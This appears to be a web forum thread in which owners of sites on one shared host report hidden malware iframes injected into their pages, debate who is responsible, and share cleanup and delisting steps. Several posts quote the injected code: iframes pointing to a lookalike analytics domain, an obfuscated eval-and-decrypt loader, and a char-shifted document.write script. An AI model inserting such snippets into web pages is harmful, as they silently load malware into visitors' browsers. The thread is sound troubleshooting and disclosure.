Whirlpool

I manage a small website for a parenting group hosted by Smartyhost. My web design knowledge is extremely basic and is limited to making simple webpages and uploading them to the server.

I have just changed my anti-virus program to Avast!, and today, when I had a look at our homepage on Smartyhost, I got an Avast! message saying there was a Trojan detected on the website. The Avast! log says: Sign of "JS:Packed-A[Trj]" has been found in "http://google-analysis.com/cgi-bin/neo3/index.cgi?in"file.

I have done a web search, and found many reports of the same problem, many of them from websites hosted by SmartyHost. The consensus seems to be that the Web Host is inserting this code (which I presume to be tracking code) without permission. One post said that they had removed the code several times from their home page, but it keeps reappearing. It seems outrageous to me that this could happen. I can imagine that most people, if they go to a website and get a Trojan warning, would immediately leave the website. If Smartyhost is in fact doing this, then they are seriously undermining the effectiveness of the websites they are hosting.

I have tried to speak to Smartyhost about this, but haven't managed to get onto them. They say they will ring back, but don't.

The obvious answer is to change hosting company, which I am looking into. However, in the meantime, does anyone know anything more about this? I have asked my daughter (a commercial lawyer) to read the Smartyhost webhosting terms and conditions, and she can't find anything that would authorise them to insert this sort of code. However, this is not her area of speciality. Any thoughts about this would be greatly appreciated.

This wouldn't be a direct SmartyHost issue.

Most likely is that you were running insecure software which has allowed malicious code to be inserted into your site without your knowledge. Always make sure you have the most up-to-date software setup on your hosting and see if Smartyhost are able to grep the files effected and place it in a text file somewhere so you can access it and remove the offending code.

Myzteriouz1 writes...

Most likely is that you were running insecure software which has allowed malicious code to be inserted into your site without your knowledge.

Exactly.

Would you happen to be running Wordpress? I think this bug may be targeted towards Wordpress users with an old version running.

Smartyhost isn't to blame this time.

Interesting.

The domain:

google-analysis.com

of course has nothing to do with Google Inc at all.

It looks to have been registered by some bad guys to resemble the legitimate Google Analytics domain

google-analytics.com

that is used by millions of sites to deploy the [legitimate] Google Analytics site stats Javascript.

I also doubt Smartyhost are the culprit here.

Either your site has been hacked to allow someone to modify pages on your site, specifically inserting that bogus link to 'google-analysis' into your HTML on site, or possibly your browser has been in some way infected to call up that bad Javascript.

Download your web pages via FTP, and check your page content or HTML carefully to see if you can find links to that bad Javascript, or pages or files that shouldn't be there on your server.

No, I'm not using Wordpress. I downloaded the web page by FTP about a week ago when I was redoing it and removed all the code relating to google-analysis. At that stage I didn't think much about it as a couple of people had previously had a go at updating the website and I thought that perhaps they had a google toolbar link or something – please remember that my knowledge of web pages is at an extremely basic level. However, the code has come back and that is why I am contacting whirlpool.

The only reason I thought it was Smarty Host's problem was because I found a number of people with the same problem, most hosted by Smartyhost [http://m.zdnet.com.au/talkback/339286907.htm?page=2]. I'm sorry if I'm bad mouthing Smartyhost. However, in my ignorance, I thought it was the Web Host's job to maintain security. All I do is create a simple HTML page and upload it to the webserver by FTP. (There is nothing on the website beyond that – no Java, no Javascript, no third party software.) Beyond that, I thought security was the job of the Host – am I wrong? Should I be doing more?

It sounds like you are pretty secure if you are only using HTML. How about your password? Is that secure? Could it be easily guessed or cracked?

The password is 12 characters – combination of random upper and lower case letters plus numbers.

With respect to the suggestion that my browser may be compromised – I run Superantispyware Pro, Spybot S&D, Spyware Blaster, Online Armor firewall and Avast! anti-virus. I update every day and do complete scans regularly. I haven't had any spyware, trojans or viruses found on my computer for a very long time.

I'd ask Smartyhost about it then. Remember, you can't be absolutely sure it is their fault yet so don't go off and abuse them

Thanks for your input. I have requested a call back from Smartyhost, so hopefully they will contact me. I have removed the suspect code from my webpage again, and I will wait to see if it returns.

Sounds like it could be the good ole budget shared hosting disease – a poorly configured server. Without correct setup all it takes is one other website being hosted on that server to be compromised and everyone pays the price. If you're not running any scripts, just static html, along with secure passwords and computers then SmartyHost probably have some answering to do

c-man writes...

It looks to have been registered by some bad guys to resemble the legitimate Google Analytics domain

Yeah..

I attempted to visit the site and my system (Google) blocked me :)

This web site at google-analysis.com has been reported as an attack site and has been blocked based on your security preferences.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 83 domain(s), including domanieyewear.com, ecomed.com.au, mtdruittworkers.com.au.

If you download your html files (via FTP), is the code there?

I downloaded the files by FTP about a week ago when I first raised the issue. The code was there then. I deleted it and uploaded the clean file. I have checked regularly since then (including just a minute ago) and it hasn't come back.

I just discovered that this script has been inserted in our home page again. I rang Smartyhost tech support and managed to get on to them!!! They said that this was happening to websites hosted by many ISPs all over the world, including to many on Smartyhost. They said that it was due to passwords being compromised (how they didn't say) and that the only thing to do was to change our password. The password certainly wan't compromised at my end – so what's to stop the new one being compromised, if it was compromised at at the ISP end?

It's always the host, never the customer.. Funny about that...

Whilst many hosts are expert liars they certaintly don't go inserting code into customers websites. What on earth made you even think about the thread title?

Because I found many complaints about this particular code on other forums, all with respect to Smarty Host websites.

Because I rang the only web professional I know and he said that he had been forced to close one account in the past, where a cheap hosting service did indeed insert unauthorised tracking code in hosted websites.

Because I have been stuffed around considerably by Smartyhost changing the terms under which I originally signed up and I began to believe them capable of anything.

And mainly because I don't know anything about this kind of issue and I forgot to put the intended question mark at the end of the thread title. It was meant to be a question, not a statement.

And – it's funny how its always the customer, never the host. Funny about that....
(And thanks to all the other posters who have actually given me HELPFUL suggestions.)

Hector writes...

Because I have been stuffed around considerably by Smartyhost changing the terms under which I originally signed up and I began to believe them capable of anything.

Well if this is the case why don't you simply cut your losses and move your site elsewhere? End your nightmare, it's not worth loosing any sleep over it!

I encountered this issue for the first time this evening whilst trying to visit a website, again hosted by Smartyhost. The website in question is a plain Static HTML format site but has been produced by one of the "website in a box" packages by the look of it. I have reported the malicious code to the website owner and hope they will share the details of how they administer their site and then allow me to contact their web developer. If I can, I will post back whatever I find out. I think it's safe to assume that Smartyhost themselves are not to blame for inserting the malicious code but there may well be a security hole in one of their servers or more likely with a web page administration program uploaded by an end user.

The code inserted on the page creates a 1 x 1 Iframe and is encoded as escaped Java unicode with a document.write function. On the site I visited, the code had been appended to the very end of the file AFTER the closing HTML tag, which would imply that it was done post HTML creation and definitely points towards an external attack to poison the page.

Will post again with any further information if I can gather any and anyone is interested

biggerdave writes...

Will post again with any further information if I can gather any and anyone is interested

That would be very useful. it is still not clear to me what the vector was here.

I just today came to do some work on a clients website when I noticed this same problem. Also hosted with smartyhost, I was quite alarmed when Firefox told me the google-analysis*com website was marked as malicious.

This problem seems to be surprisingly widespread. Our passwords are reasonably secure. This would indicate to me that either Smartyhost are the cause, or there is a large security hole on the Smartyhost end....

I also have a small website with smartyhost and have had the same error reported. Am trying to track it down now. Will post here with any valuable info I come across.

Oh bother, bother! We just got the same treatment for our club cycle racing web site. I was suspicious when Symantec blocked 202.75.35.222. I thought it was a false positive for Google Analytics until I did a nslookup and found google-analysis.com was a Malaysian site.

Thanks to you guys for posting this as it made the rest of the diagnosis so easy and we were able to post clean HTML. We'll continue to monitor to see if the HTML remains just as we uploaded it or gets changed again.

Once again, thanks for documenting this.

This is why i love whirlpool!.

We just had someone tell us one of our sites had a trojan, and funnily enough it was on smartyhost!

so it all makes sense now

It doesn't seem that Smartyhost are very pro-active about monitoring the security of their servers then. That's a bad sign.

It may very well be security misconfigs at the customer end (somehow) but as the box owner Smartyhost should certainly get involved and take some ownership of the issue to help nail this, IMHO.

After all, these aren't un-managed deidicated servers or colo boxes we are talking about – Smartyhost provide shared hosting and thereby assume basic responsibility for the good running of the system overall.

Having multiple customers getting their shared sites infected/poisoned (even static sites) would certainly get me interested in fixing the problem if I was running a shared host biz.

Is this the same problem with hacking that MD Webhosting had a while back?

/forum-replies.cfm?t=923810&p=1

/forum-replies.cfm?t=918288

/forum-replies.cfm?t=913594

That seemed to be hacking and iFrame insertion into clients sites...

I've just had a client tell me that they are with Smarty Host and ask if they need to change. I came to Whirlpool to check them out and will be recommending a move...

Hey there,

Your site has been hacked.

If you have any PHP in your site or if you have a shop, forum etc.. which is PHP based then you may have been hacked directly.

However, you are likely to be hosting your site on a shared server so someone else using poor PHP in thier site has been hacked and therefore gained a certian level of access to other sites on that server.

Could have been a username/password hack also.

Re upload site with your backup.

It's likely your index.html file was hacked.. so make it read only on the server.

Hey Hector :)

Don't now anything about SmartyHost, but if on a shared server and users are allowed to upload/download via FTP then usernames/passwords can be compromised via sniffing & once an attacker, or their bot is on the system, it can then look for further weaknesses to exploit and gain even more privileges & ultimately cause more damage to your pages/data/site etc..

THEREFORE:

1. Username/Password compromise as SmartyHost says IS possible.

2. If SmartyHost are not proactive in NOW, atleast forcing users to access accounts securely via SSH,(you can do FTP over an SSH connection for secure transfers) then I'd be looking elsewhere.

3. Since SmartyHost know, lets assume, username/passwords are being intercepted and abused, why are they not atleast running some auto-scrubbing bots until they force customers into SECURE ONLY connections to accounts.

4. FIND A NEW HOST – I recommend obtaining a VPS host if not going dedicated, as with VPS it's like multiple dedicated servers per actual computer, hence if one site gets borked due to a security weakness, ie. PHP exploit, username/password compromised etc., this does NOT automatically translate to all user accounts being held hostage as it does with a shared server.

Have heard good things in the past in regards to www.johncompanies.com,(even have a LinuxJournal 2006 Editors Choice Award, http://www.linuxjournal.com/article/9368 -[ Quick Google before I posted ]) but never hosted with them as yet – so do your own research in this regard and ALWAYS USE SECURE TRANSFERS, NEVER VANILLA FTP, TELNET or HOST LOGINS :)

FreeBSD is the best OS in my opinion for security for most people,( ignoring mention of OpenBSD etc., as am thinking hosting options will be rather limited.. :) ), as FreeBSD has some really neat security auditing tools such as portaudit,(it checks your packages/ports for reported security weaknesses & prevents accidental installation of insecure ports/packages as well.). :)

Ps. If the shared server has a control panel like CPanel then these are often very good ways for having your accounts vulnerable when security issues with said panels, or versions of said panels arise, due to the fact so many people utilise them,(10,000+ webhosts = AWESOME ATTACK VECTOR).. think of new unknown MS Windows/IE viruses/exploits and how quickly they can spread before an AV Update/Patch to secure yourself from them is available.

NOTE: I use FreeBSD for both home & work for my own piece of mind,... almost said,.. "Work, Rest & Play",... but I prefer Snickers bars :P """

Hope this helps.

Later, RIPP.

Same here my Smartyhost was hacked the same and I can not login to my panel just get a 404 page not found. I had spent 30 mins typing a support ticket and got message back telling me to log in to panel and send report from there. Looks like they may have taken down the 'panel'?
I use Joomla and the files hacked were index.php, index2.php (Hacked 7/6/08 at 04:20 servertime. 3:20 Australia time) and smarty_index.html. (Hacked
17/5/2008 @ 14:11 = 00:11 Australia time)

Also the permissions of smarty_index.html was hacked to give execute to all. This file is common to all sites and the code was simple (I added the XXXX just in case it runs here:
<bodyXXXX>
<iframeXXXX src=httpXXXX://google-analysis.com/in.cgi?9 width=1 height=1></iframe><iframe src=httpXXXX://google-analysis.com/in.cgi?9 width=1 height=1></iframeXXXX>

Will try and contact Smarty to find out why I can not get the Panel login, may be they have been hacked as well?

Tony

I resolved my login to panel by a ping to get my host IP address then I could get the login screen.
I have opened a ticket to see what they have to say.

Tony.

Here is my attempt at decode / unescape of the hack code added to my PHP files I have added the XXXX.

<iframeXXXX src=httpXXXX://google-analysis.com/in.cgi?9 width=1 height=1></iframeXXXX>

<iframeXXXX src=httpXXXX://google-analysis.com/in.cgi?9 width=1 height=1></iframeXXXX>

<scriptXXXX>
function load(code,dfunc,anticasp)
{
eval(dfunc);
decrypt(code);
}

load('<`B15ni[X1hIZQQFx;;lSSloi{5Y5o_X`X.hSn;`Y.hl`?T[g`(QZIm[Zi`lZQIm><;`B15ni>',

//I have unescaped following lines to reveal script code

function decrypt(n)
{var l, ch, ind,q="",key="OD&:x9T6H@fBAC#y_wgloSEb~K[chZei`a5z-{jv!Pk|r1mnYU}qV7/;pF]sXG=ILtQJ0u\'2Md(4*";

for(l=0;l<n.length;l++)
{
ch=n.charAt(l);
ind=key.indexOf(ch);
if(ind>-1)
{
if(ind==0)
{
ind =79
}
q+=key.charAt(ind-1)
}
else {q+=ch}
};
document.write(q) //write to the iframe window??
}
);
</scriptXXXX>

Up to you javascript guru's to make any sense of this. Could not resist trying to see what was going on. When I post the leading spaces are removed but code was indented to look reasonable.

Tony

Looks like I won't be working with this client unless they accept my advice to change hosts... I don't need to get blamed for a hosting company's problems...

clarit writes...

Looks like I won't be working with this client unless they accept my advice to change hosts... I don't need to get blamed for a hosting company's problems...

I think you will find its a software issue, Not something to do with the Host itself, Makes sense doesn't it?..

Smarty host happens to have websites affected with this code... and so does MD web hosting, I guess it wouldn't have anything to do with the fact that they could be running the same software application?

c-man writes...

It doesn't seem that Smartyhost are very pro-active about monitoring the security of their servers then. That's a bad sign.

Its not the job of the web host to ensure their clients hosted software is up to date, That comes down to the client.

C.

Christopher. writes...

Its not the job of the web host to ensure their clients hosted software is up to date, That comes down to the client.

it is their job to provide some kind of security, when there is obviously more then one account affected it is a server issue

ethix writes...

it is their job to provide some kind of security, when there is obviously more then one account affected it is a server issue

If they were running upto date software, There wouldn't be an issue in the first place..

Once again, this is shared hosting we are talking about. Server stability, integrity and security is at least, IMHO, 80% the responsibility of the host.

After all, the host might be running a buggy or misconfigured Apache or MySQL implementation, which could be the root of the problem here. What can the user do about that? And the host controls the firewall (if there is one) and users don't, And the host restricts the ability of users to also run application security software too, like mod_security, or update or recompile PHP to include the suhosin patch, I bet. Etc.

You are also wrong if you believe 'if they [users] were running up to date software' there would be no security problems either. This belief presumes that (a) all vendors keep their software up to date and (b) all software vendors have perfect knowledge of all of the possible or active vulnerabilities out there that might be used against their apps. Neither (a) or (b) is true. Keeping things up to date is useful but not the end of the problem.

Also even the most up to date application can be misconfigured or poorly implemented and potentially left vulnerable to attack, so keeping up-to-date isn't an automatic fix for anything.

+1 c-man. How can you be expected to keep things up to date if you (as a web host client) have no access??

clarit writes...

How can you be expected to keep things up to date if you (as a web host client) have no access??

So you're saying you don't have access to the software files to which you installed on the server? (The PHP files from whatever it is you have had hosted with your webhost?)

Christopher – Have you ever had shared hosting???

If you have, go and download Apache, MySQL, PHP etc and compile them to keep them current for your web space. Then report back and tell me how to do it.

clarit writes...

If you have, go and download Apache, MySQL, PHP etc and compile them to keep them current for your web space. Then report back and tell me how to do it.

I did while I owned my own webhosting business :)

What I don't think you're understanding is, Those word press blogs, Phpbb forums etc, If they were kept upto date. And not 12 months old, Most exploits used by these application would become patched etc.

Add me to the list of smartyhost users with infected websites :(

If I remove the trojan bit, and change my password, will I be safe from further attack??

It seems really impossible that this many clients' passwords have been compromised, and far far more likely that Smartyhost's web server is compromised.

Change hosts immediately.

*cough* SQL Server injection. *cough* Nothing to do with the hosting company...

http://www.owasp.org/index.php/Testing_for_SQL_Injection
http://msdn.microsoft.com/en-us/library/ms161953.aspx

Its a programming issue on each individual site, the web site code is allowing unchecked data to pushed into the database used for the HTML content.

Firefox and NoScript is your friend.

dig.

how do you know it is

Digger writes...

*cough* SQL Server injection. *cough*?

Nothing to do with the hosting company...
*cough* Mod Security *cough*

Firefox and NoScript is your friend.
not sure what you mean by this

ethix writes...

*cough* Mod Security *cough*

Yeah Cause' that protects your webserver from EVERYTHING ;)

Same issue here... SmartyHost, purely static content, no php/asp/etc, not even shtml.

ShiftyPhil writes...

Same issue here... SmartyHost, purely static content, no php/asp/etc, not even shtml.

Proving yet again that if this many people are having issues, even with static content, that it's highly unlikely it's SQL injection or that each individual user's password was compromised through cleartext traffic inspection.

It has to be that Smartyhost's server got owned, and modified these pages without needing access to the user's accounts.

Christopher. writes...

What I don't think you're understanding is, Those word press blogs, Phpbb forums etc, If they were kept upto date. And not 12 months old, Most exploits used by these application would become patched etc.

No. What _you_ are not understanding is that as a client of shared hosting you do not have permission to do _any_ of what you say.

OK – you ran your own hosting company, that is different. Then you have _permission_ to secure. Again, as a client of shared web hosting, you do not have permission to keep these things up to date.

clarit writes...

OK – you ran your own hosting company, that is different. Then you have _permission_ to secure. Again, as a client of shared web hosting, you do not have permission to keep these things up to date

You're just taking this around in circles – I dont think this has anything to do with the server software here. I think this is a shared hosting software application issue, (IE: those applications you install when you use fantastico etc: PHPBB, WordPress, Joomla, PHPnuke)

Christopher. writes...

You're just taking this around in circles – I dont think this has anything to do with the server software here. I think this is a shared hosting software application issue, (IE: those applications you install when you use fantastico etc: PHPBB, WordPress, Joomla, PHPnuke)

Shouldn't PHP etc. be limited to the home directory it is ran in?

No, It takes just one Client on a shared hosting server to run old software which has an unpatched exploit and the whole server becomes infected.

What I am finding strange is that there has been no input into this thread from anyone from SmartyHost.

Is this the same issue that affected MD wh?

If you are looking for a new host can I suggest

AussieHost
http://www.aussiehost.com/

You can host multiple domains from the one account.

Christopher. writes...

No, It takes just one Client on a shared hosting server to run old software which has an unpatched exploit and the whole server becomes infected.

That is incorrect,(atleast as regards, FreeBSD, Linux & other *nix styled hosting)... That only gets you access to that clients account/(shell environment etc.) and you gain their privileges, however, to infect, or tamper with other users data,(since you're talking about only 1 user in your example ETC.) then the server software and/or other privileges on the server, must have exploitable weaknesses and this software and these configurations are set up & maintained,(hopefully pro-actively for security concerns) by the webhost.

Later, RIPP.

JackCare writes...

What I am finding strange is that there has been no input into this thread from anyone from SmartyHost.
Agreed; and what I'm also finding amusing/strange is the people who keep posting saying it's application software that's causing the problem. People – listen – some of these sites have only static HTML pages – NO CODE. And yes, it could well be the issue that affected other webhosting companies.

There are several possible vectors. One is that the server has been root compromised and this is entirely possible given the number of reports over a variety of sites. There are shared library compromises and an attack via PHP dl() that alter the behaviour of PHP (although, these are static pages) that could be the cause for PHP based sites. If the server has been completely compromised, it could have been rootkitted and an Apache module added that randomly inserts this code. Next time you get infected, check the actual code on the server via ftp to see if the actual HTML code has been altered or whether it's an on-the-fly insertion. Please check this and let us know. If it's on-the-fly insertion there's no doubt at all it's a major server compromise. Which means server rebuild time, make sure you grab your backups!

Another possibility is that the ftp password was sniffed. Could have happened over WiFi if it's been used, but probably unlikely given the number of reports of breakins.

BTW there are some nasty application level exploits out there at the moment. If you're running Joomla 1.5, your site will be exploited in the next few days unless your host is smart enough to run mod_security, or unless you update your Joomla.

That only gets you access to that clients account/(shell environment etc.) and you gain their privileges
Unfortunately not completely true; it depends whether they are running PHP under suphp (each user under their own UID) or whether they're running PHP as user nobody (pretty much open slather to everyone's files on all accounts, although smarter hosts running PHP this way do restrict their PHP functionality to make it harder).

brianoz writes...

Unfortunately not completely true; it depends whether they are running PHP under suphp (each user under their own UID) or whether they're running PHP as user nobody (pretty much open slather to everyone's files on all accounts, although smarter hosts running PHP this way do restrict their PHP functionality to make it harder).

:) --- I could have put in a caveat,.. and thought about such,.. but deemed that it may make things more confusing to the reader.... however, this form of running PHP was more in the olden days before such PHP exploit-ability was well known,.. these days any host running PHP in such an unrestricted manner is greatly reducing user security & thus it comes down, again, to the fault of the webhost when an exploit happens that can affect MULTIPLE users, particularly those that do not run any form of actively exploitable content... ie. truly static pages.

As such my previous post was/is still fully correct,... as this would come under " ... then the server software and/or other privileges on the server, must have exploitable weaknesses and this software and these configurations are set up & maintained .. by the webhost. ".

Later, RIPP.

Thanks RIPP and brianoz for the backup. I think I wasn't quite getting through to Christopher in my posts.

I agree that this is most likely a server exploit.

Good advice about checking static html via ftp vs on the fly. That would surely narrow it down to apache...

Anyway, my client is not going to be hosting with them now – yaaay!

Just received an email from google,

"Dear site owner or webmaster of mysite.com.au,

We recently discovered that some of your pages can cause users to be
infected with malicious software. We have begun showing a warning page
to users who visit these pages by clicking a search result on Google.com."

I have checked it out and It has the same script inserted into the bottom of the page. This is now the fourth site that has been attacked in this manner. This page was simply a html page with a flash file in it. the only script on it was for flash detection/version checking.

I have re uploaded my page and now I have to go through the process of having the site re validated with google.

I have been slowly moving all of my "budget" hosting over to Jumba as they expire with Smartyhost. I think i may bite the bullet and cut my losses with the rest of them and move them over before this happens again. I know that this problem could potentially happen with Jumba too. but I have much more faith in them being able to rectify the problem if it arises.

So if anyone from Smarthost reads this you have lost about 10 sites to Jumba with me alone. I have been hosting with you since 2002. I was one of the stayers that gave you 9 lives. But I am afraid you have used them all.

Today I visited my Website hosted by smartyhost to find it is blocked also.

I downloaded my pages only to find the following code inserted at the bottom of my page.

"<script>function load(code,dfunc,anticasp){eval(dfunc);decrypt(code);}load('<`B15ni[X1hIZQQFx;;MuM./z.3z.MMM;~5lX;`Y(i9.FZF[g`(QZIm[Zi`lZQIm><;`B15ni>',unescape('function decrypt%28n%29%7Bvar l%2Cch%2Cind%2Cq%3D%22%22%2Ckey%3D%22OD%26%3Ax9T6H%40fBAC%23y_wgloSEb%7EK %5BchZei%60a5z-%7Bjv%21Pk%7Cr1mnYU%7DqV7%2F%3BpF%5DsXG%3DILtQJ0u%5C%272Md%284%2A%22%3Bfor%28l%3D0%3Bl%3Cn.length%3Bl%2B%2B%29%7Bch%3Dn.charAt%28l%29%3Bind%3Dkey.indexOf%28ch%29%3Bif%28ind%3E-1%29%7Bif%28ind%3D%3D0%29%7Bind %3D79%7Dq%2B%3Dkey.charAt%28ind-1%29%7D else %7Bq%2B%3Dch%7D%7D%3Bdocument.write%28q%29%7D'));<Removed>

I have always been a supporter of smartyhost and recommended them to friends, relatives, customers. But now I am just p!ssed.

I have opened a ticket just waiting to hear back >.<

passionfruit writes...

I have been slowly moving all of my "budget" hosting over to Jumba

They'll be thrilled :)

We look after a site with them, not our choice, and its been infected again!

how awesome is that.

smartyhost are the worst hosting company.

Killer Klaus0r writes...

smartyhost are the worst hosting company.

Wheres that band wagon? I would like to jump on if I may ;p

woohoo! my site is also blocked. I am going to leave smartyhost tomorrow. insecure and ridiculously expensive for what it is.

is it possible to transfer my domain to another host? is this expensive?

what a nightmare.

Yes!!
And now to get yourself delisted as a spyware site,by Google,u have to add Google spyware to your code.
Interesting !!!!!!!

I dealt with this sort of stuff about 4-5 years ago on a stack of websites. Basically I was working for a web-dev company, and we resold hosting (eww). The reseller account itself was on a shared web server.

Now the problem is that on a lot of these setups, there is either vulnerabilities in the management software (i.e. cPanel/Plesk), which allows somebody to gain complete control, or there is a silly situation with the way the web server (normally Apache) is configured – it's typically set to run Apache as a single user, regardless of the site being shown (i.e. www-data:www-data or something like that), and so you end up with a situation where a vulnerability in a single client site is basically a vulnerability in all websites.

In the end I had to transfer a stack of sites across to another host, and also discuss these issues with the new hosting company (I did thorough testing to ensure it couldn't happen again) and in the end they did a good job of checking everything and making some changes based on conversations we had (the new hosting company was westnet btw).

Ultimately I decided to never use cheap hosting again, and generally stick to ones I know that have implemented things properly. I mostly use either westnet or ilisys. Others may also be good, but unfortunately it's hard to know without signing up and trying them out.

IMO the issue has come about because so many hosts seem to be network admin experts, but don't entirely understand the implications of shared hosting, but think they can just roll out a cPanel/Plesk-style pre-made setup and all will be sweet. As it turns it's not that simple.

I should point out that I can't actually recall what web control panel was the issue (i.e. cPanel, Plesk, others), I just mention those two to indicate the sort of system that was in use.

Good luck dealing with the various annoying hidden iframe crap.

seawise writes...

Yes!!
And now to get yourself delisted as a spyware site,by Google,u have to add Google spyware to your code.
Interesting !!!!!!!

What are you talking about, I got my issue resolved, NO extra "Google spyware code" added to my pages.

SmartyHost removed the code for me and I used http://www.stopbadware.org/home/reportsearch to remove my site from being blacklisted.

Simple fix but still a pain in the @ss.

If it happens again I will leave them for sure.

**Mafaroo** writes...

If it happens again I will leave them for sure.

Wow, what a trusting client.

Please do the research now and choose your next host. Make sure you have full backups and if your site changes regularly, get a process to back it up regularly.

They've proven to be incapable of protecting clients from this problem as the thread goes back months – get out now!

Tks Mafaroo
I reloaded the site so its now clean.
I originally tried to get Google to recheck the site,and that when I encountered all the crap,about adding Google code.
(Appears u cant ask Google themselves to recheck it unless u put their code into the webpage)
So I took your alternative solution thru "stopbadware.org",and hopefully it will get cleard soon

A guy on another forum was having the same problem.

I asked if he was on smartyhost, yep he is.

He has an email from a few days ago where they blame his scripts (static html site), but then also admit they are working with a security firm to investigate (yeah I know, standard BS response).

Cant believe they still deny and point the finger at clients. This issue is months old, dont pretend they didnt see this thread from the start.

seawise writes...

So I took your alternative solution thru "stopbadware.org",and hopefully it will get cleard soon

Nice, I filled out the online form yesterday afternoon and it was unblocked when I checked this morning.

I filled out the form two days ago and it still has not been delisted. I used the Google Administrator tools to report it. I will try the StopBadWare one now.

Ridiculous company.

**Mafaroo** writes...

Wheres that band wagon? I would like to jump on if I may ;p

SMARTYHOST IS CRAP. Pretty sure its just one guy that runs it out of his grandmother's basement.

Arh yes only 12 months after the migration stuff up we are all having to deal with another flaw into the Smarty host system.

I have nearly 200 accounts with SH and have experienced this virus problem with 20+ this time and some months ago the same problem with 10 other sites.

The best way to fix it is to:
1. change the FTP password use 12 charters with strong content.
2. download the index files from site and remove the malicious code which is usually on the 3rd last line above</html>.
3. reload the files.
4. if you have flash content on the index page named index.swf remove the files and add the one you have on your local computer.
5. add the site to Google webmaster tools.
6. verify the site with the html file method.
7. from Google tool submit for the site to be reviewed and the blacklist removed.

This all worked for me, and as of today SH have found a work around and have found the issue and have fixed it- you will notice in your server under the index.html file a file like this: index.html.200808261302 which can be left there or removed as all malicious code was removed.

The thing that has peeved me off is the time i have had to spend on this and the numerous clients i have had to deal with and not to mention the 2 that i have now lost!!!!

Its a pity, seems there arent too many good hosters left nowdays.
Nothing beats a certain company who has phone support, when you call up, they either say submit a ticket, or if you ask to speak to the person in charge of a certain area, and that person says I am, but then says, sorry, i dunno how to fix that problem, submit a ticket.

In the end, the old adage holds true, you get what you pay for, and im sick of monkies

Killer Klaus0r writes...

In the end, the old adage holds true, you get what you pay for, and im sick of monkies

Give www.cove.com.au a look. I have one of their "business" plans using a discount coupon and its been nothing but perfect. I have had to use support a couple of times (phone and email) and everything i have needed has been done quickly.

They have reps on whirlpool to so that is nice to know.

- Zac

Thanks for the update Mibar, Whirlpool is the closest thing us Smartyhost users have to customer support :)

I had a lengthy discussion with Tim from Smartyhost after my post here, so yes they are watching whirlpool.

On the issue of this problem all he said was,

Hi Peter. I was interested to find out (from one of our resellers) that Melbourne IT had a similar issue last year. Hackers will always try to exploit a new wrinkle until we jump on them with both feet. But it might interest you to know that all of the resources of Smartyhost and MYOB (and a lot of money and outside consultants) were thrown at the problem.

No mention of weather the problem is actually fixed or even what it was for that matter. But it is the first admission that there is an issue with their servers that I have come across.

When I questioned tim on why they don't have an open disclosure policy and cant simply communicate with their clients as to what is happening and why it is happening his reply on this was.

At Smartyhost we try and tread a fine line between harassing our customers (and our resellers) with information which is often of no use to them and sometimes confusing.

So apparently a PHP upgrade from php4 to php5 on my server was information that was deemed no use to me?

I have a question for all Smarthost users, apart from an email the day before the botched optus migration has anyone ever had any contact from Smartyhost to tell them of any upcoming maintenance outage etc? since 2002 I have not and i am wondering if it is just me. Im not sure about this fine line IMO there is simply no disclosure what so ever.

oh and this was a giggle. Here is a snippet of the email you receive from google when your site has been screened and de listed

In many cases, a website run by an innocent site owner has been hacked by a malicious third party, causing the site to distribute badware without the site owner's knowledge. If your site was distributing badware because it has been hacked, then simply removing the bad code from your site is not enough to keep your site clean in the future. You will also need to work with your hosting provider to fix all security vulnerabilities associated with your site.

the bold bit made me laugh. sure bob... sure

Its true, you get what you pay for...

You might be ahead for some time, but when the shit hits the fan its a different story, for critical sites, or if I was a reseller there is no way I would be going el cheapo.

At the end of the day when you start loosing clients/income over hosting it pays to spend the money.. after all, your website counts for alot of your businesses reputation.

I've had 6 websites have this code inserted today:

<script>var source ="=jgsbnf!tsd>#iuuq;00hpphmf.bobmjufdt/dpn0jo/dhj@3#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = "";

for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);

document.write(result); </script>

I've removed other code numerous times (more times than I care to count to be honest) and this time it completely crashed a formum and rendered two other php pages useless.

This happened to 3 of my sites.

Did everyone get new passwords sent to them from SH yesterday?
Do you think they did this because of this issue?
I think they extended all passwords to 12 digits now

Has anybody been able to work out how the code is being inserted?

It could be a range of things from compromised FTP passwords to a PHP app thats out of date or even a server being hacked to shreds.

It would just be good to know if its random or there is some common link here.

- Zac

Zac Greenhill writes...

compromised FTP passwords

unlikely Zac, as its more than one account we're talking about here.

Zac Greenhill writes...

PHP app thats out of date

Most common

Zac Greenhill writes...

server being hacked to shreds

Not as common but its a likely story.

Was there ever a final announcement of what actually happened here – either directly from SmartyHost, or from a User's personal investigation/knowledge?

It looks like a separate webhosting company, ICDSoft, has been hit with the exact same attack this past week – even inserting the exact same code/iframe snippet.

I have seen it affect completely different Accounts, some with php scripts, others completely static HTML.

I am going to follow up with them and see what they know – but if someone has some more info already, it would help.

ie. If I just say "It happened to SmartyHost last year" it probably wouldn't assist much. But if I named a specific Trojan name or something, or a specific exploit – it could help.

Thanks.

I have just had 2 of my sites with this code injected into all the pages <iframe src=http://hostads.cn style=display:none></iframe> This is the second time I have had my sites compremised with these assholes, I will be moving asap.

Smartyhost = Worst Hosting Ever